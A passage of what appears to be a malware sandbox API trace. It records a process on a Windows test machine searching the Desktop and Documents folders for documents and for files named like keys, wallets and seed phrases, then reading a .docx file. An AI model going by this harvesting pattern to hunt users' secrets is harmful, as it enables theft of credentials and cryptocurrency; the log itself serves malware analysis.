"c:\\users\\rdhj0cnfevzx\\desktop\\*.doc*"), lpFindFileData=0x19ef4c | out: lpFindFileData=0x19ef4c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa69231b0, ftCreationTime.dwHighDateTime=0x1d85344, ftLastAccessTime.dwLowDateTime=0x21ccbae0, ftLastAccessTime.dwHighDateTime=0x1d855b0, ftLastWriteTime.dwLowDateTime=0x21ccbae0, ftLastWriteTime.dwHighDateTime=0x1d855b0, nFileSizeHigh=0x0, nFileSizeLow=0xee8e, dwReserved0=0x0, dwReserved1=0x0, cFileName="VZP4_.docx", cAlternateFileName="VZP4_~1.DOC")) returned 0x6934d0 [0262.122] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19ef5c | out: lpFindFileData=0x19ef5c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0262.123] FindClose (in: hFindFile=0x6934d0 | out: hFindFile=0x6934d0) returned 1 [0262.123] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f1e4) returned 1 [0262.123] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f1f0) returned 1 [0262.123] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f224) returned 1 [0262.123] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", nBufferLength=0x105, lpBuffer=0x19ed2c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x0) returned 0x1d [0262.123] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", nBufferLength=0x105, lpBuffer=0x19ed00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpFilePart=0x0) returned 0x1e [0262.123] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\*key*" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\*key*"), lpFindFileData=0x19ef4c | out: lpFindFileData=0x19ef4c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0262.124] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f1e4) returned 1 [0262.124] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f1f0) returned 1 [0262.124] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f224) returned 1 [0262.124] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", nBufferLength=0x105, lpBuffer=0x19ed2c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x0) returned 0x1d [0262.124] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", nBufferLength=0x105, lpBuffer=0x19ed00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpFilePart=0x0) returned 0x1e [0262.124] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\*wallet*" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\*wallet*"), lpFindFileData=0x19ef4c | out: lpFindFileData=0x19ef4c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0262.124] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f1e4) returned 1 [0262.124] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f1f0) returned 1 [0262.124] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f224) returned 1 [0262.124] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", nBufferLength=0x105, lpBuffer=0x19ed2c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x0) returned 0x1d [0262.124] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", nBufferLength=0x105, lpBuffer=0x19ed00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpFilePart=0x0) returned 0x1e [0262.124] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\*seed*" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\*seed*"), lpFindFileData=0x19ef4c | out: lpFindFileData=0x19ef4c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0262.125] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f1e4) returned 1 [0262.125] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f1f0) returned 1 [0262.127] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\VZP4_.docx", nBufferLength=0x105, lpBuffer=0x19edc4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\VZP4_.docx", lpFilePart=0x0) returned 0x28 [0262.127] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f270) returned 1 [0262.127] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\VZP4_.docx" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\vzp4_.docx"), fInfoLevelId=0x0, lpFileInformation=0x225af5c | out: lpFileInformation=0x225af5c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa69231b0, ftCreationTime.dwHighDateTime=0x1d85344, ftLastAccessTime.dwLowDateTime=0x21ccbae0, ftLastAccessTime.dwHighDateTime=0x1d855b0, ftLastWriteTime.dwLowDateTime=0x21ccbae0, ftLastWriteTime.dwHighDateTime=0x1d855b0, nFileSizeHigh=0x0, nFileSizeLow=0xee8e)) returned 1 [0262.127] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f26c) returned 1 [0262.127] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\VZP4_.docx", nBufferLength=0x105, lpBuffer=0x19ed94, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\VZP4_.docx", lpFilePart=0x0) returned 0x28 [0262.127] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", nBufferLength=0x105, lpBuffer=0x19edb0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x0) returned 0x1d [0262.127] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\.", nBufferLength=0x105, lpBuffer=0x19ed44, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x0) returned 0x1d [0262.128] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\VZP4_.docx", nBufferLength=0x105, lpBuffer=0x19ed44, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\VZP4_.docx", lpFilePart=0x0) returned 0x28 [0262.130] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\VZP4_.docx", nBufferLength=0x105, lpBuffer=0x19edb0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\VZP4_.docx", lpFilePart=0x0) returned 0x28 [0262.133] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\VZP4_.docx", nBufferLength=0x105, lpBuffer=0x19ed84, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\VZP4_.docx", lpFilePart=0x0) returned 0x28 [0262.133] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f1e4) returned 1 [0262.133] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\VZP4_.docx" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\vzp4_.docx"), fInfoLevelId=0x0, lpFileInformation=0x19f260 | out: lpFileInformation=0x19f260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa69231b0, ftCreationTime.dwHighDateTime=0x1d85344, ftLastAccessTime.dwLowDateTime=0x21ccbae0, ftLastAccessTime.dwHighDateTime=0x1d855b0, ftLastWriteTime.dwLowDateTime=0x21ccbae0, ftLastWriteTime.dwHighDateTime=0x1d855b0, nFileSizeHigh=0x0, nFileSizeLow=0xee8e)) returned 1 [0262.133] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f1e0) returned 1 [0262.133] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\VZP4_.docx", nBufferLength=0x105, lpBuffer=0x19ecb8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\VZP4_.docx", lpFilePart=0x0) returned 0x28 [0262.133] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f1ac) returned 1 [0262.133] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\VZP4_.docx" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\vzp4_.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x444 [0262.133] GetFileType (hFile=0x444) returned 0x1 [0262.134] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f1a8) returned 1 [0262.134] GetFileType (hFile=0x444) returned 0x1 [0262.144] ReadFile (in: hFile=0x444, lpBuffer=0x225ca90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f220, lpOverlapped=0x0 | out: lpBuffer=0x225ca90*, lpNumberOfBytesRead=0x19f220*=0x1000, lpOverlapped=0x0) returned 1 [0262.145] ReadFile (in: hFile=0x444, lpBuffer=0x225ca90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f220, lpOverlapped=0x0 | out: lpBuffer=0x225ca90*, lpNumberOfBytesRead=0x19f220*=0x1000, lpOverlapped=0x0) returned 1 [0262.146] ReadFile (in: hFile=0x444, lpBuffer=0x225ca90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f220, lpOverlapped=0x0 | out: lpBuffer=0x225ca90*, lpNumberOfBytesRead=0x19f220*=0x1000, lpOverlapped=0x0) returned 1 [0262.147] ReadFile (in: hFile=0x444, lpBuffer=0x225ca90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f220, lpOverlapped=0x0 | out: lpBuffer=0x225ca90*, lpNumberOfBytesRead=0x19f220*=0x1000, lpOverlapped=0x0) returned 1 [0262.147] ReadFile (in: hFile=0x444, lpBuffer=0x225ca90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f220, lpOverlapped=0x0 | out: lpBuffer=0x225ca90*, lpNumberOfBytesRead=0x19f220*=0x1000, lpOverlapped=0x0) returned 1 [0262.148] ReadFile (in: hFile=0x444, lpBuffer=0x225ca90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f220, lpOverlapped=0x0 | out: lpBuffer=0x225ca90*, lpNumberOfBytesRead=0x19f220*=0x1000, lpOverlapped=0x0) returned 1 [0262.148] ReadFile (in: hFile=0x444, lpBuffer=0x225ca90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f220, lpOverlapped=0x0 | out: lpBuffer=0x225ca90*, lpNumberOfBytesRead=0x19f220*=0x1000, lpOverlapped=0x0) returned 1 [0262.148] ReadFile (in: hFile=0x444, lpBuffer=0x225ca90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f220, lpOverlapped=0x0 | out: lpBuffer=0x225ca90*, lpNumberOfBytesRead=0x19f220*=0x1000, lpOverlapped=0x0) returned 1 [0262.149] ReadFile (in: hFile=0x444, lpBuffer=0x225ca90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f220, lpOverlapped=0x0 | out: lpBuffer=0x225ca90*, lpNumberOfBytesRead=0x19f220*=0x1000, lpOverlapped=0x0) returned 1 [0262.150] ReadFile (in: hFile=0x444, lpBuffer=0x225ca90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f220, lpOverlapped=0x0 | out: lpBuffer=0x225ca90*, lpNumberOfBytesRead=0x19f220*=0x1000, lpOverlapped=0x0) returned 1 [0262.190] ReadFile (in: hFile=0x444, lpBuffer=0x225ca90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f220, lpOverlapped=0x0 | out: lpBuffer=0x225ca90*, lpNumberOfBytesRead=0x19f220*=0x1000, lpOverlapped=0x0) returned 1 [0262.190] ReadFile (in: hFile=0x444, lpBuffer=0x225ca90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f220, lpOverlapped=0x0 | out: lpBuffer=0x225ca90*, lpNumberOfBytesRead=0x19f220*=0x1000, lpOverlapped=0x0) returned 1 [0262.191] ReadFile (in: hFile=0x444, lpBuffer=0x225ca90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f220, lpOverlapped=0x0 | out: lpBuffer=0x225ca90*, lpNumberOfBytesRead=0x19f220*=0x1000, lpOverlapped=0x0) returned 1 [0262.191] ReadFile (in: hFile=0x444, lpBuffer=0x225ca90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f220, lpOverlapped=0x0 | out: lpBuffer=0x225ca90*, lpNumberOfBytesRead=0x19f220*=0x1000, lpOverlapped=0x0) returned 1 [0262.192] ReadFile (in: hFile=0x444, lpBuffer=0x225ca90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f220, lpOverlapped=0x0 | out: lpBuffer=0x225ca90*, lpNumberOfBytesRead=0x19f220*=0xe8e, lpOverlapped=0x0) returned 1 [0262.192] ReadFile (in: hFile=0x444, lpBuffer=0x225c0b2, nNumberOfBytesToRead=0x172, lpNumberOfBytesRead=0x19f220, lpOverlapped=0x0 | out: lpBuffer=0x225c0b2*, lpNumberOfBytesRead=0x19f220*=0x0, lpOverlapped=0x0) returned 1 [0262.192] ReadFile (in: hFile=0x444, lpBuffer=0x225ca90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f220, lpOverlapped=0x0 | out: lpBuffer=0x225ca90*, lpNumberOfBytesRead=0x19f220*=0x0, lpOverlapped=0x0) returned 1 [0262.197] CloseHandle (hObject=0x444) returned 1 [0262.197] ExpandEnvironmentStringsW (in: lpSrc="%userprofile%", lpDst=0x19f17c, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX") returned 0x16 [0262.197] ExpandEnvironmentStringsW (in: lpSrc="%userprofile%\\Documents", lpDst=0x19f17c, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x20 [0262.197] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f224) returned 1 [0262.197] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents", nBufferLength=0x105, lpBuffer=0x19ed2c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents", lpFilePart=0x0) returned 0x1f [0262.198] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\", nBufferLength=0x105, lpBuffer=0x19ed00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\", lpFilePart=0x0) returned 0x20 [0262.198] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\*.txt" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\*.txt"), lpFindFileData=0x19ef4c | out: lpFindFileData=0x19ef4c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0262.198] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f1e4) returned 1 [0262.198] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f1f0) returned 1 [0262.198] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f224) returned 1 [0262.198] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents", nBufferLength=0x105, lpBuffer=0x19ed2c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents", lpFilePart=0x0) returned 0x1f [0262.199] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\", nBufferLength=0x105, lpBuffer=0x19ed00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\", lpFilePart=0x0) returned 0x20 [0262.199] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\*.doc*" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\*.doc*"), lpFindFileData=0x19ef4c | out: lpFindFileData=0x19ef4c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe1d7e20, ftCreationTime.dwHighDateTime=0x1d85971, ftLastAccessTime.dwLowDateTime=0x3f4d47d0, ftLastAccessTime.dwHighDateTime=0x1d85973, ftLastWriteTime.dwLowDateTime=0x3f4d47d0, ftLastWriteTime.dwHighDateTime=0x1d85973, nFileSizeHigh=0x0, nFileSizeLow=0x303c, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p6pTJgMWLzzWhXu.docx", cAlternateFileName="5P6PTJ~1.DOC")) returned 0x6934d0 [0262.199] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19ef5c | out: lpFindFileData=0x19ef5c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x682972f0, ftCreationTime.dwHighDateTime=0x1d84604, ftLastAccessTime.dwLowDateTime=0xba4ea120, ftLastAccessTime.dwHighDateTime=0x1d854a2, ftLastWriteTime.dwLowDateTime=0xba4ea120, ftLastWriteTime.dwHighDateTime=0x1d854a2, nFileSizeHigh=0x0, nFileSizeLow=0x8410, dwReserved0=0x0, dwReserved1=0x0, cFileName="oiJ2wkMa.docx", cAlternateFileName="OIJ2WK~1.DOC")) returned 1 [0262.199] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19ef5c | out: lpFindFileData=0x19ef5c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ef0bfd0, ftCreationTime.dwHighDateTime=0x1d84f28, ftLastAccessTime.dwLowDateTime=0x9dd8eda0, ftLastAccessTime.dwHighDateTime=0x1d84fa4, ftLastWriteTime.dwLowDateTime=0x9dd8eda0, ftLastWriteTime.dwHighDateTime=0x1d84fa4, nFileSizeHigh=0x0, nFileSizeLow=0xd1c2, dwReserved0=0x0, dwReserved1=0x0, cFileName="STAR.docx", cAlternateFileName="STAR~1.DOC")) returned 1 [0262.199] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19ef5c | out: lpFindFileData=0x19ef5c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2dc00fb0, ftCreationTime.dwHighDateTime=0x1d7d3d7, ftLastAccessTime.dwLowDateTime=0xa85ef480, ftLastAccessTime.dwHighDateTime=0x1d81d64, ftLastWriteTime.dwLowDateTime=0xa85ef480, ftLastWriteTime.dwHighDateTime=0x1d81d64, nFileSizeHigh=0x0, nFileSizeLow=0xd7e5, dwReserved0=0x0, dwReserved1=0x0, cFileName="Xb3GYZMjrsH.docx", cAlternateFileName="XB3GYZ~1.DOC")) returned 1 [0262.200] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19ef5c | out: lpFindFileData=0x19ef5c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9a2f3700, ftCreationTime.dwHighDateTime=0x1d7f0a3, ftLastAccessTime.dwLowDateTime=0x4f2012b0, ftLastAccessTime.dwHighDateTime=0x1d7fb26, ftLastWriteTime.dwLowDateTime=0x4f2012b0, ftLastWriteTime.dwHighDateTime=0x1d7fb26, nFileSizeHigh=0x0, nFileSizeLow=0xfc2f, dwReserved0=0x0, dwReserved1=0x0, cFileName="yl3VHIXIZf hfomVle.docx", cAlternateFileName="YL3VHI~1.DOC")) returned 1 [0262.200] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19ef5c | out: lpFindFileData=0x19ef5c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81981900, ftCreationTime.dwHighDateTime=0x1d83a90, ftLastAccessTime.dwLowDateTime=0xf4f75fd0, ftLastAccessTime.dwHighDateTime=0x1d83ef2, ftLastWriteTime.dwLowDateTime=0xf4f75fd0, ftLastWriteTime.dwHighDateTime=0x1d83ef2, nFileSizeHigh=0x0, nFileSizeLow=0xbac0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ySeuDfEI7.docx", cAlternateFileName="YSEUDF~1.DOC")) returned 1 [0262.200] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19ef5c | out: lpFindFileData=0x19ef5c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0262.201] FindClose (in: hFindFile=0x6934d0 | out: hFindFile=0x6934d0) returned 1 [0262.201] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f1e4) returned 1 [0262.201] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f1f0) returned 1 [0262.201] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f224) returned 1 [0262.201] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents", nBufferLength=0x105, lpBuffer=0x19ed2c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents", lpFilePart=0x0) returned 0x1f [0262.201] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\", nBufferLength=0x105, lpBuffer=0x19ed00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\", lpFilePart=0x0) returned 0x20 [0262.201] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\*key*" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\*key*"), lpFindFileData=0x19ef4c | out: lpFindFileData=0x19ef4c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0262.201] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f1e4) returned 1 [0262.201] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f1f0) returned 1 [0262.201] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f224) returned 1 [0262.201] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents", nBufferLength=0x105, lpBuffer=0x19ed2c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents", lpFilePart=0x0) returned 0x1f [0262.202] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\", nBufferLength=0x105, lpBuffer=0x19ed00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\", lpFilePart=0x0) returned 0x20 [0262.202] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\*wallet*" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\*wallet*"), lpFindFileData=0x19ef4c | out: lpFindFileData=0x19ef4c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0262.202] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f1e4) returned 1 [0262.202] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f1f0) returned 1 [0262.202] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f224) returned 1 [0262.202] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents", nBufferLength=0x105, lpBuffer=0x19ed2c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents", lpFilePart=0x0) returned 0x1f [0262.202] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\", nBufferLength=0x105, lpBuffer=0x19ed00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\", lpFilePart=0x0) returned 0x20 [0262.202] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\*seed*" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\*seed*"), lpFindFileData=0x19ef4c | out: lpFindFileData=0x19ef4c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0262.203] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f1e4) returned 1 [0262.203] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f1f0) returned 1 [0262.203] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\5p6pTJgMWLzzWhXu.docx", nBufferLength=0x105, lpBuffer=0x19edc4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\5p6pTJgMWLzzWhXu.docx", lpFilePart=0x0) returned 0x35 [0262.203] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f270) returned 1 [0262.203] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\5p6pTJgMWLzzWhXu.docx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\5p6ptjgmwlzzwhxu.docx"), fInfoLevelId=0x0, lpFileInformation=0x228f774 | out: lpFileInformation=0x228f774*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe1d7e20, ftCreationTime.dwHighDateTime=0x1d85971, ftLastAccessTime.dwLowDateTime=0x3f4d47d0, ftLastAccessTime.dwHighDateTime=0x1d85973, ftLastWriteTime.dwLowDateTime=0x3f4d47d0, ftLastWriteTime.dwHighDateTime=0x1d85973, nFileSizeHigh=0x0, nFileSizeLow=0x303c)) returned 1 [0262.203] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f26c) returned 1 [0262.203] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\5p6pTJgMWLzzWhXu.docx", nBufferLength=0x105, lpBuffer=0x19ed94, lpFilePart=0x0 